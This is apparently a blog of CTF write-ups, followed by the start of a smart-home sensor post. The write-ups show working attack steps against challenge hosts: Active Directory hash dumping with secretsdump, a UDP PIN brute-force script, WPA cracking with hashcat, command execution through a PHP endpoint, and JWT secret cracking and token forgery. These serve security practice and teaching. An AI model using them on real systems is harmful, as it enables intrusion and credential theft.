An exception is an abnormal event or error that occurs during the execution of a program. Exceptions are typically used to handle unexpected or exceptional conditions, such as runtime errors or input-output errors. When an exception occurs, it is typically represented as an object that is thrown, and it can be caught and handled by the program using a try-catch block.

Attachment: l33t.rar

So now we have a RAR file, and some ramblings about exceptions. As expected, the RAR is password protected. Looking at the strings that we have:

$ strings l33t.rar 
Rar!
CMTPython 3.7.3
>>> 
Traceback (most recent call last):
  File "<pyshell#4>", line 1, in <module>
    
ZeroDivisionError: 
 <- Password 
flag.txt0
90|ua

So we have a random Python snippet somewhere in the file with a mention to <- Password, wut? … We also have a ZeroDivisionError, so maybe that’s why the ramblings about exceptions ! Let’s recreate the exception in python:

Python 3.10.6 (main, Mar 10 2023, 10:55:28) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 1/0
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ZeroDivisionError: division by zero

Using the division by zero message as the password for the RAR file, we got ourselves a txt file with the flag.

Flag: flag{l0vef@rf4t0h}

A Programming Language (200 pts)

flag←48 55 45 52 73 53 0 67 63 4 59 5 73 24 69 9 62 15 64 76 43 16 78 73 18 96 ⊢WTF←⎕UCS{⍵-¨10-⍨⍳≢⍵}+flag+2⊥¯3⌽1 0 1 1 0 1

So we got ourselves a little APL dark magic. I smelled this from afar due to its usage in CodeGolf. The code was missing a newline, but apart from that it was just copy and paste in an online interpreter:

TryAPL Version 3.6.1 (enter ]State for details)
Tue Apr 11 2023 17:41:13
Copyright (c) Dyalog Limited 1982-2023
      flag←48 55 45 52 73 53 0 67 63 4 59 5 73 24 69 9 62 15 64 76 43 16 78 73 18 96 
      ⊢WTF←⎕UCS{⍵-¨10-⍨⍳≢⍵}+flag+2⊥¯3⌽1 0 1 1 0 1
flag{f0rm1g0sAm0d4doM1nh0}

Flag: flag{f0rm1g0sAm0d4doM1nh0}

Find The Typo (300 pts)

Attachment: flag.zip

So we have another random one! Also, it was more easy than it should because I know someone that spends a lot of time playing this. This is Nonogram game (it is available on the Play Store). I did not spend any time solving it manually, but going to an online solver was a breeze.

And we got ourselves a Pacman, or pacman, or pac man, or… well, after some trial and error, and checking the correct name online, it was pac-man the password of the zip file.

Flag: flag{bread_bread_cheese_cheese}

Back Me UP! (400 pts)

Someone left backups of a Domain Controller in an open share. A portion was extracted from the backup and myth be told that it contains critical information (and a flag ;) ). Can you get it?

Attachment: AD_backup.zip

So we have a ZIP file with a registry folder and a ntds.dit file. Trying to solve this challenge in a Linux machine (since my Windows VM refused to boot), I found out that Impacket script collection has a secretsdump.py to dump sensitive info from registry file.

$ secretsdump.py -ntds ~/Projects/oposec-christmas-22/Active\ Directory/ntds.dit  -system ~/Projects/oposec-christmas-22/registry/SYSTEM -security ~/Projects/oposec-christmas-22/registry/SECURITY local
Impacket v0.10.1.dev1+20221214.172823.8799a1a2 - Copyright 2022 Fortra

[*] Target system bootKey: 0x5fb07a625512cd828efd1eb75ab24c1c
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:4f790a53e86a5b4498a70b18eb3fec2c27cd40ad444a88808ea02fc2bdc88a507c1dd9fa04d86ae44be8641adb0cc46ad6fcadd1dedf04903b3be9c792b0d368a59e57a1616c2548fdabe842665c6c0b8d31dbf0a24cd3d4887e334e95ea051481c41a15ed7abf849cf9ae7361f30913cbf92e0e31d205bf1943b09181d4c8373884c3ce1cd311b5bcc35dbb3d810689170abdc0386ffd62ef663b2b7dd9b97c417753bddef4e11142a49049b75939d0db71b7f0e0c17ec5305a680fd6de4d769d060679668859e3ec3d5139a980371d5d4e0fca5ae7a2a28f185c76cd42e12ab994b4aa0547f547d71394577d382457
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:870dc1dcd1b50a8f04472485c3e445c1
[*] DefaultPassword 
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x63d8fb27d7efe53e156719dc2e8dce0aad846543
dpapi_userkey:0x48a4390382dc50a00c7244cf23a3567a002b4e2d
[*] NL$KM 
 0000   1D 05 A6 71 87 FE 0C 45  DC 84 3F DD BB 18 ED C9   ...q...E..?.....
 0010   3E 83 1E E4 01 CB 1F 55  8A C1 C9 AA D0 57 0E D9   >......U.....W..
 0020   1B EB A1 25 99 6F D0 D0  D8 DF 5B 6D 56 23 F9 8E   ...%.o....[mV#..
 0030   F5 40 C5 06 F0 E6 46 B1  2C 93 76 DE 0F 58 00 B8   .@....F.,.v..X..
NL$KM:1d05a67187fe0c45dc843fddbb18edc93e831ee401cb1f558ac1c9aad0570ed91beba125996fd0d0d8df5b6d5623f98ef540c506f0e646b12c9376de0f5800b8
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: db591b9546c39acc89bc2eb9d943a927
[*] Reading and decrypting hashes from /home/jpdias/Projects/oposec-christmas-22/Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-AG9BSPKRNKB$:1001:aad3b435b51404eeaad3b435b51404ee:870dc1dcd1b50a8f04472485c3e445c1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4dbcaca1dfa95d13b246c66a6fee6c7f:::
user10:1104:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
maria:1105:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
john:1106:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
thomas:1107:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
sneakyuser:1108:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Kerberos keys from /home/jpdias/Projects/oposec-christmas-22/Active Directory/ntds.dit 
WIN-AG9BSPKRNKB$:aes256-cts-hmac-sha1-96:105437447f915bb677f66b5ec17dab9ae9700dfb5b068d8d52e959c1dd378ac2
WIN-AG9BSPKRNKB$:aes128-cts-hmac-sha1-96:6d800550e0fbfdeb42cd1fb013b71222
WIN-AG9BSPKRNKB$:des-cbc-md5:b04561fe194cb534
krbtgt:aes256-cts-hmac-sha1-96:7cbaa71e3119169ec41d642bc9ce7fd3a0e408ee4e1d7865c62edf311b018218
krbtgt:aes128-cts-hmac-sha1-96:897496dd3737a6523b63e04b2d275b8a
krbtgt:des-cbc-md5:6b7a91d940a77a2f
user10:aes256-cts-hmac-sha1-96:38b0bd0f4366e1ec84c22da5a44f3222ceabfe3a4bb0556ef1ca036b9207779f
user10:aes128-cts-hmac-sha1-96:1098796a633a40dfb761ffe4ba4e8ab4
user10:des-cbc-md5:6bc8d97c92e31c13
maria:aes256-cts-hmac-sha1-96:28652e7eb642c5fb72dc6319c8277c548d4e047edde7d47cb7146a807c76110e
maria:aes128-cts-hmac-sha1-96:e1a1949b1e209c833b49aa8e974da8ee
maria:des-cbc-md5:758cd9dab07a5151
john:aes256-cts-hmac-sha1-96:252973000b5100f74fa1e86416fa70ff4114b0310ef774e126a9659d4780d7d3
john:aes128-cts-hmac-sha1-96:2beef7900a25e473a9448a0cfedcfbe3
john:des-cbc-md5:15524949b39279f7
thomas:aes256-cts-hmac-sha1-96:80efbc413a0b3a4f6b0669a055543591b30fb6dfbd0ea086fbccf5829adce7c8
thomas:aes128-cts-hmac-sha1-96:a4f3d94c073cda99a452e89a42ecf124
thomas:des-cbc-md5:bcdcd9e9cbb9d3c1
sneakyuser:aes256-cts-hmac-sha1-96:6e06d087eda3b232a7d03624154a8117f09635e8f49450b7c18e92d37b4694cb
sneakyuser:aes128-cts-hmac-sha1-96:71b81137f9c21e242b67e7552065e8f9
sneakyuser:des-cbc-md5:d092ce91ba029104
[*] Cleaning up... 

So we have a lot of info, but no flag. After some more searching and messing around I found out that we can dump the tables from the ntds.dit file¹. This will create a new directory, called ntds.dit.export with the dumped tables.

$ esedbexport -m tables Active\ Directory/ntds.dit
esedbexport 20220806

Opening file.
Database type: Unknown.
Exporting table 1 (MSysObjects) out of 13.
Exporting table 2 (MSysObjectsShadow) out of 13.
Exporting table 3 (MSysObjids) out of 13.
Exporting table 4 (MSysLocales) out of 13.
Exporting table 5 (datatable) out of 13.
Exporting table 6 (hiddentable) out of 13.
Exporting table 7 (link_history_table) out of 13.
Exporting table 8 (link_table) out of 13.
Exporting table 9 (quota_rebuild_progress_table) out of 13.
Exporting table 10 (quota_table) out of 13.
Exporting table 11 (sdpropcounttable) out of 13.
Exporting table 12 (sdproptable) out of 13.
Exporting table 13 (sd_table) out of 13.
Export completed.

Now that we have (hopefully) all the data extracted, we can just grep and see if we get something.

$ grep -rnw flag .

flag{ClearBackupsCanPwnU}

In a Windows machine you could use DSInternals to quickly dump all the data and find the flag more easily.

Flag: flag{ClearBackupsCanPwnU}

Network

867 CFR (100 pts)

867 CFR is a protocol for sending data across networks. It is connectionless, meaning it does not establish a dedicated connection between sender and receiver. This makes it faster but less reliable than other transport protocols. 867 CFR is often used for real-time applications such as gaming and VoIP, and for low-overhead services like DNS. Weird stuff! Can you have a look? xx.isymra.22samxopo (344)

So, 867 RFC, let’s do some reading. Daytime Protocol, A daytime service (UDP or TCP) simply sends a the current date and time as a character string without regard to the input. …wut?

And several hours have passed, and I was lost. Taking a break, and looking at it again, all made sense, everything is in reverse order! ~~OMFG so much time has been lost!~~

So, again, RFC 768 describes User Datagram Protocol (UDP). Something familiar now! Let’s connect!

$ nc -u  opoxmas22.armysi.cc 443
a
}eep_eed_uoy{galf

Flag: flag{you_dee_pee}

Who’s There? (200 pts)

I do not have a physical body, but I am here to help you with any questions you may have, give me a PIN, and I will tell you what to do next!

opoxmas22.example.com (22222) looks interesting!

We have a UDP based service that requests a PIN (let’s assume a 4 digit pin). So 10 000 possible combinations… Easy enough to do a script (with some timeout and retry logic because sometimes things went wrong).

from itertools import product
from pwn import *
encoding = 'utf-8'
# your list needs be all-characters
lst = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
a = ["".join(item) for item in product(lst, repeat=4)]

r = remote('opoxmas22.armysi.cc', 22222, typ="udp", timeout=1)
i = 0
while True:
    r.send(bytearray(a[i]+"\n", encoding))
    res = str(r.recv(timeout=2), encoding)
    if res == "":
        r.close()
        r = remote('opoxmas22.armysi.cc', 22222, typ="udp")
        r.send(bytearray(a[i]+"\n", encoding))
        res = str(r.recv(timeout=2), encoding)
        print(a[i], res)
    if res != "WRONG PIN!":
        print("PIN:", a[i], "\n>", res)
        while True:
            new_result = re.findall('[0-9]+', res)
            print(new_result)
            if(len(new_result) != 3):
                exit()
            r = remote('opoxmas22.armysi.cc', new_result[0], typ="udp")
            r.send(bytearray(new_result[2]+"\n", encoding))
            res = str(r.recv(timeout=2), encoding)
            print(">", res)

    i += 1
# interactive mode
r.close()
# r.interactive()

And we have our first PIN, 0000 puff… After guessing the PIN, we have a series of prompts that give us a new port and a new PIN to be used. Since I didn’t know how many redirects there would be, I just programmed the script to automatically parse the message and do a new connection in chain. And that’s how we get our flag!

[+] Opening connection to opoxmas22.armysi.cc on port 22222: Done
PIN: 0000 
> Opened port 26128 - Hurry you got 60 seconds!. Use this PIN - 4283
['26128', '60', '4283']
[+] Opening connection to opoxmas22.armysi.cc on port 26128: Done
> Opened port 24571 - Hurry you got 60 seconds!. Use this PIN - 8503
['24571', '60', '8503']
[+] Opening connection to opoxmas22.armysi.cc on port 24571: Done
> Flag{Kito_KitoWho?_MosKito}
[]
[*] Closed connection to opoxmas22.armysi.cc port 24571
[*] Closed connection to opoxmas22.armysi.cc port 26128
[*] Closed connection to opoxmas22.armysi.cc port 22222

Flag: Flag{Kito_KitoWho?_MosKito}

My Network is Secure! (300 pts)

Taberna belga said their free WiFi is secure because it has a password, however people are still getting passwords! How is this~possible?!

Attachtment: SecureNetwork.cap

And now is time for some network capture stuff. But the network is “protected” with WPA-TKIP (i.e., WPA-1). Thus, we can break it, somehow. With hcxdumptool we can dump the hash of the WiFi password in a hashcat compatible format:

$ editcap -F pcap SecureNetwork.cap SecureNetwork.pcap
$ hcxpcaptool -z hash.txt SecureNetwork.pcap

WPA*02*4ca8dcfc1ae47ae4c892d2cc25f4e1e5*907841398870*d6a78c062e85*5365637572654e65742057696669*3ca0a8709bf3a4dc5041041109b41f01565f7b5a30608ed4c02e5c4f523e4be3*01030077fe01090020000000000000000110f11a201a62f4f081e097ee34d8c20f84822bb6aa0ab4c0af3423657187dbf80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000018dd160050f20101000050f20201000050f20201000050f202*02

Running hashcat in a Google Colab² we can harness the power of the free GPUs and quickly brute-force the hash using a dictionary (in the case, rockyou.txt).

hashcat (v6.2.6-208-gcd8bff168) starting

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.2)
====================
* Device #1: Tesla T4, 15007/15109 MB, 40MCU

OpenCL API (OpenCL 1.2 CUDA 11.2.109) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla T4, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Initializing backend runtime for device #1. Please be patient...tcmalloc: large alloc 1405091840 bytes == 0x5625daafa000 @  0x7fc30b79e001 0x5625aec13c46 0x5625aec5d04d 0x5625aec0a45c 0x5625aec0adb2 0x5625aec05aff 0x7fc30a9d0c87 0x5625aec05b5a
Host memory required for this attack: 1470 MB

Dictionary cache built:
* Filename..: wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

4ca8dcfc1ae47ae4c892d2cc25f4e1e5:907841398870:d6a78c062e85:SecureNet Wifi:spiderman
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: QVuyxSZh
Time.Started.....: Sat Jan  7 22:08:10 2023 (0 secs)
Time.Estimated...: Sat Jan  7 22:08:10 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   345.9 kH/s (7.09ms) @ Accel:64 Loops:128 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 207722/14344384 (1.45%)
Rejected.........: 125802/207722 (60.56%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456789 -> 2deenero
Hardware.Mon.#1..: Temp: 63c Util: 48% Core:1230MHz Mem:5000MHz Bus:16

Started: Sat Jan  7 22:07:39 2023
Stopped: Sat Jan  7 22:08:11 2023

And it’s cracked! spiderman is the strong password in this one!

Using spiderman as the password in Wireshark we can see all the network traffic, and if we follow the only existing TCP connection, we can get our flag ³!

Flag: flag{morestudy}

Wrap-up

Another Xmas, another CTF. As always, kudos for the challenge makers, and to OPOSEC community. This was the final top 10, and yes, I just started playing late in the game due to time constrains. At the time of writing there is an official write-up is available here.

Portuguese Cybersecurity Competition CTF Write-up

Thu, 08 Dec 2022 00:00:00 +0000

Some weeeks ago I’ve participated in the “Portuguese Cybersecurity Competition” organized by InvestAmarante and powered by hackrocks. Given that this was a begginer friendly (maybe too friendly…) Capture The Flag competition there were no major learning takeways, but it is always useful to pratice some old tricks and tools (and do some over-engineering… as always).

The ~~worst~~ less good part of the CTF was that the challenges categories did not match the challenges content, and seemed purely random.

I also want to give kudos mluis for the company as he also participated in the CTF, making things more fun! So let’s get to the write-up!

Strange Email

The text of the mail is as follows:

Good morning! I would like to order, please, a T-shirt with the following image printed on it, since I am a big fan of computers…

000 111 0000 100 0001 0000 / 101 0000 111 000 / 0100 / 100 0110 / 10 0100 110 1101 100 000 000 0000 110 / 0100 1101 / 010 000 010 001 011 010

Strange… that string doesn’t seem to make any sense in binary. However, if it is a help message, it is obvious that your messages could be monitored and therefore you must hide the real message somehow?

Can you help us find the young man being held??

So this was a cryto / obfuscation challenge. While I’ve lost more time than I’m proud to admit solving this challenge, this is pretty trivial if you consider that (1) the bits sequences do not follow any standard, i.e., no multiple of two, and (2) the separator / gives it away. Nonetheless, my first attempt was to use quipqiup to solve it without any luck. Next I followed the overengineering path and attempt to solve it using a Bacon’s cypher without any luck.

I’ve solved other challenges in the meanwhile, and given that this was the welcoming challenge, it cannot be that hard. Looking back at the visible hints, if we replace: 0 -> . and 1 -> - we discover a plain old Morse message, that can be easy decoded using CyberChef or any other tool

However the resulting letters does not making any sense… Maybe a little rotation solves the problem? ROT13 gave no results, but ROT23 (!?) worked perfectly!

And the flag is OPORTO.

Veracruz

Here you have the Found files.zip. Your mission will be to analyze these files and find out if there’s something wrong… Let’s go!

This was the trickiest one. Three files were inside the files.zip archive:

contenedor.pdf: ~~what I tought to be~~ a corrupted PDF file. Using all the tricks to recover the file to a readable format didn’t succed. binwalk also wasn’t able to extract anything from the file.
README.txt: a TXT file with the following text: Hi there, This PDF is the receipt for the encryptor we bought in Saimazoon.
algarve.jpg: A random photo. Using all the steg tools (props to Aperi’solve) to extract information from the image did not provide anything.
portugal1.jpg: Similar to the previous random picture, there was nothing within it.

After spending some time messing around with it, and talking with mluis, he suggested that it could be related with Veracrypt (the challenge title says it all now…). So, assuming that the corrupted PDF file was the vault, the keys must lie amongst the remaining files.

After finding out that you can use files as partial keys to the vault, and with some trial and error, we found out that the algarve.jpg was the keyfile, and the password string was extracted from the README.txt file, being the location of the hypothetical delivery site, Saimazoon.

This would give access to a text file with the flag, SLINKWOIRU.

Shopper

Connect to the service, called shopper, and try to exploit it:

challenges.hackrocks.com:42421 NOTE: No other ports are part of this challenge.

Finally, a shell/service to play with! Connecting using telnet:

❯ telnet challenges.hackrocks.com 42421
Trying 95.216.99.248...
Connected to challenges.hackrocks.com.
Escape character is '^]'.
1. buy chocolate $1
2. buy token $100
your money $10
choose: 

So we have a system that lets us buy chocolates for 1$! So messing around with the input must give us something. Attempting to simply crash the service with large values or strings did not give it away immediatilly.

Once again, mluis suggested using MAX values, e.g. MAX_INT or MIN_INT given the inputs are always numeric. Doing that trick, giving the MIN_INT as input to option 1 (-2147483648), we can have MAX MONEY:

1. buy chocolate $1
2. buy token $100
your money $10
choose: 1
how much> -2147483648
1. buy chocolate $1
2. buy token $100
your money $2147483658
choose: 2
the token is: flag{n3gativ3_input_and_m0re_money}

And we get the flag: flag{n3gativ3_input_and_m0re_money}.

Ovlo

You will find the service at the following host: challenges.hackrocks.com:37881

Ready? Then don’t waste your time and go ahead!
NOTE: No other ports are part of this challenge.

This challenge, once again, gives us a shell to play with, as well as the C source code of the service running in port 37881.

So, connecting to it:

❯ telnet challenges.hackrocks.com 37881
Trying 95.216.99.248...
Connected to challenges.hackrocks.com.
Escape character is '^]'.
vent anything to me

So we are given an “infinite” input box, vent anything to me. Without even looking at the sauce, we can enter a lot of a to see what happens!

vent anything to me
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
the flag is flag{m0r3_th4n_72_n1ce!}

Connection closed by foreign host.

Ah! Just a plain trivial buffer overflow, and we got the flag, flag{m0r3_th4n_72_n1ce!}.

mluis did spend some time looking at the binary source code, and found out that there is an signal handler for SIGSEGV that prints the flag if any part of the code does an illegally access or modify memory, typically caused by uninitialized or NULL pointer values or by memory overlays.

Hidden In the Web

Set up your toolkit, and get ready to start the audit…

To access the challenge, click on the following link: http://example.com:10101

![[Screenshot 2022-12-01 at 12-35-41 Hidden In the Web - hackrocks.png]

So, this time we get a web challenge with greet us with a under construction page. Looking at the source code of the page we get an obvious hint:

<!-- 
Hey Marcus, dont forget to change the permission of environment. thanks!
Sincerely, Adrian
 -->

So Marcus must change the permissions to some file. Let’s get a dir buster running. But, let’s start by the simpliest scan, open OWASP Zap and do a default automatic scan give us an exposed sensitive file, .env. The content of that file was juicy, as expected:

❯ curl 'http://example.com:10101/.env'
PATH=/s3cr3t_3ntr4nce.php
CMD=c0mm
METHOD=GET

So we have a path, s3cr3t_3ntr4nce.php that gives us command execution! Let’s mess around a litte in the folder directory:

❯ curl 'http://example.com:10101/s3cr3t_3ntr4nce.php?c0mm=ls%20%2F..'
bin
boot
dev
etc
flag.txt
home
lib
...

Oh! An obvious flag.txt file!

❯ curl 'http://example.com:10101/s3cr3t_3ntr4nce.php?c0mm=cat%20%2Fflag.txt'
flag{m4rcus_f0rg0t_t0_change_perm_env_and_igot_shell}

Printing the contents, we get our flag, flag{m4rcus_f0rg0t_t0_change_perm_env_and_igot_shell}

Talkies Talk

We just know that the person is named James, and a Picture of the last place he was. Can you find him?

So this was an OSINT challenge. The first part of the challenge was pretty straightforward, just finding the place were the picture was taken, you can use Google Images, or Yandex Image search to get to the result directly.

So, we have KOPI 98 cafe located in Jl. Boulevard Graha Raya No.30, Paku Jaya, Kec. Serpong Utara, Kota Tangerang Selatan, Banten 15220, Indonesia. But where to go from here now?

After losing some hair trying to understand where to go from here, mluis suggested to look into the reviews, and we found the flag.

Author: Jameskenniyantopurica Nice coffee
flag{n0needToreverseImag3me!}

Flag was flag{n0needToreverseImag3me!}.

Access the website provided to us and help us rewrite the report.
To access the challenge, click on the following link: http://example.com:17821

So another web challenge. This was also a pretty straightforward challenge, but I didn’t look at the source code, so I took the longest road possible. But let’s get to the details. We have a web page with 3 sub pages, Home, Admin, and Message. Trying to access the Admin page gives us an alert message: no cookie!. So we have to get a cookie.

Getting to the Message page, we have an input box for our name. Entering anything in this field gives us a cookie that set the field x-access-token.

However, if we try to access the Admin we still don’t have the necessary cookie. Looking at the cookie we can see that it is a jwt token: x-access-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwdWJsaWNfaWQiOiJndWVzdCIsImlkIjoidGVzdCIsImV4cCI6MTY2OTkwMDI3NX0.G-MCKnN3jluboyrxXCHDCU2TF8CfZWVXnyUc3HP4QfQ

Using jwt.io we can see the fields of the cookie which is signed with HMACSHA256:

{
    "public_id": "guest",
    "id": "test",
    "exp": 1669900275
}

So we can see that our public_id is guest, and, most probably, we need to be admin to access the Admin page. So, trying to understand the most common attacks to jwt I found out a tool, JSON Web Token Toolkit v2, that, after configuring the target URL and specifying our jwt as input, automatically attempts to find issues with it, as it quickly found out that the key using to sign the token was 12345 by merely bruteforce with the built-in dictionary. However, as aforementioned, this was an unnecessary effort, given that as a commentary in the source code we had the following message:

<!-- 
putting jwt beautifier in here soon!
DEBUG note for QA:
the current jwt secret is 12345
-->

Oh well. Using the same tool also aids us on generating a new jwt with any modifications we need:

❯ python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwdWJsaWNfaWQiOiJndWVzdCIsImlkIjoidGVzdCIsImV4cCI6MTY2ODI1NTkxOH0.QKE7Vlzxr_-BzOmFhPnYPjw9cuVYJjsrNatDRSBikyc -T -S hs256 -p "12345"

Token header values:
[1] alg = "HS256"
[2] typ = "JWT"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0

Token payload values:
[1] public_id = "guest"
[2] id = "test"
[3] exp = 1668255918    ==> TIMESTAMP = 2022-11-12 12:25:18 (UTC)
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of public_id is: guest
Please enter new value and hit ENTER
> admin
[1] public_id = "admin"
[2] id = "test"
[3] exp = 1668255918    ==> TIMESTAMP = 2022-11-12 12:25:18 (UTC)
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_98c7e8bf492b3d9160ae70364245e1b8 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwdWJsaWNfaWQiOiJhZG1pbiIsImlkIjoidGVzdCIsImV4cCI6MTY2ODI1NTkxOH0.T3aPtPlGJ8FDt_K3z0-57yOHNdoWyJ3bAERbIJd4KWQ

Trying to access the admin page with the crafted x-access-token reveals the flag: flag{wh0a_y0u_g0t_m3_g00d_thr0ugh_jwt}

Distant Sounds

Just an Audio file. At the moment, we don’t have much information for you, only that it has somehow been involved in the latest attack by a known cybercriminal gang.

So another steg/crypto challenge with an sounds.wav file. Listing to the audio it is obviously Morse code, so using Morse Code Adaptive Audio Decoder we get the message SAYFRIENDANDCOMEIN. But this was not the flag.

In this part I’ve wasted too much time looking at this as a reference to Lord of the Rings when Gandalf tries to enter Moria by the Western Gate, given that the challenge was similar:

“It reads ‘The Doors of Durin — Lord of Moria. Speak, friend, and enter.’” – Gandalf

But using the movie referenced word “mellon” as the flag, the Sindarin word for “friend”, did not work.

One thing that I noticed is that the audio was really sloooww, so maybe there was more to the file than meets the ear. Attempting binwalk provided nothing new. However, one other tool that is commonly used to hide files in wav sound files is steghide.

Doing steghide extract –sf sounds.wav prompt us to enter a password, and using as password the word friend gave us a secret.txt file.

❯ cat secret.txt
Greetings! Youve found the flag for this game: IWHIOPDNJI

So the flag is IWHIOPDNJI.

Talkies Talk II

The GCP indicates that it has managed to find out that maigret should be used, because James would never send a picture without hidden information.

We get an image and nothing more. I’ve wasted too much time also on this challenge because I missed to notice the obvious, but oh well. After attempting all the usual stegnography tricks, no luck. Even the output of exiftool did not provide any useful info, or at least, that was what I though. After mluis suggestion to look closer to the output of exiftool it became obvious that there was an author in the picture metadata, 0xdc9. As the username was hexadecimal it passed by me as purely gibberish, but it was not.

Using maigret or, more knownly, sherlock, both tools to find usernames in social networks, would quickly lead us to a Twitter account with only one post:

And we get our last flag: flag{well_i_am_exposed_through_one_pic}

Wrap-up

So this was the first CTF by InvestAmarante, and the first one that I played from hackrocks. As a newbie friendly CTF it was quick to solve (even quicker if I did not so much time into rabbit holes). A recommendation for hackrocks is to be more realistic/precise about the categories, and try to stick to the common ones that typically apply. And, at last, I managed to finish in the 11^th position.

A (not so smart) smart home

Mon, 03 Oct 2022 00:00:00 +0000

Internet-of-Things, cyber-physical systems, smart spaces, smart anything… All these buzzwords and keywords are either vendor-generated for pushing ever-complex devices and things from WiFi-controlled kettles to health monitoring devices or created by academia (e.g., Internet-of-Everything, Web-of-Things, Connected Devices, Smart Devices) to sustain minor works by reinventing well-known technologies and approaches. In this post we will go back to the basics of IoT, without all the keyword-driven buzz, and build a simple temperature/humidity monitoring system with a mostly straightforward architecture and with minimal programming/configuration needs.

The Problem

Off-the-shelf IoT devices are typically (1) complex by depending on proprietary application-layer specifications for communicating and, sometimes, even depend on specific hardware, (2) expensive, especially if you wish for something more or less reliable, (3) depend on proprietary software (with all the bonus telemetry and other goods ~~powered by some states~~), and, lastly, (4) they do a lot of unnecessary things (e.g., always-on microphones).

Nonetheless, I see the potential in IoT, although I disagree with how most IoT systems are built today. For simple problems, simple solutions (and, preferably, cheap ones). And the problem is simple, and I want to monitor the humidity and temperature of several rooms in a two-floor house. But (1) I should be able to do it with cheap off-the-shelf devices (even if I need to flash them), (2) the setup/programming should be minimal, (3) data should be available anywhere anytime, and (4) the architecture of the system should be minimal, i.e., I do not want to run five different services on top of an always-on Raspberry Pi just to be able to see a chart with some data points.

The Approach

Finding the Right Device

First things first, we need a sensor device capable of collecting temperature/humidity and communicating this data wirelessly. There are a lot of sensors in the market capable of doing such using different protocols and with different power efficiency solutions.

For starters, we could use some WiFi-based setup, with some cheap ESP8266 plus a DHT22; however, the power consumption of those devices is not that low, so it would require some maintenance in terms of batteries (and, further, it would require some soldering and manual wiring). Next, we could use some ZigBee / Thread / Matter or whatever Connectivity Standards Alliance is now pushing as the “solution” for the standards issue¹, but that would require specific hardware or some DIY gateway with a Raspberry and a ZigBee / Thread dongle, so no-go. There are other “state-of-the-art” solutions, but they are typically expensive or over-engineered for this use case.

Lastly, one of the technologies that have been around for some time now (circa 2009) and have proven to be one of the most battery-efficient ones is Bluetooth Low Energy. And as one of the oldest techs, it is easy to find cheap devices that leverage the protocol, one of them being the Xiaomi MIJIA Temperature and Humidity Monitor 2 (model: LYWSD03MMC), which can be found for around 5$ a piece.

Removing the Xiaomi Mi Home Dependency (Flashing Firmware)

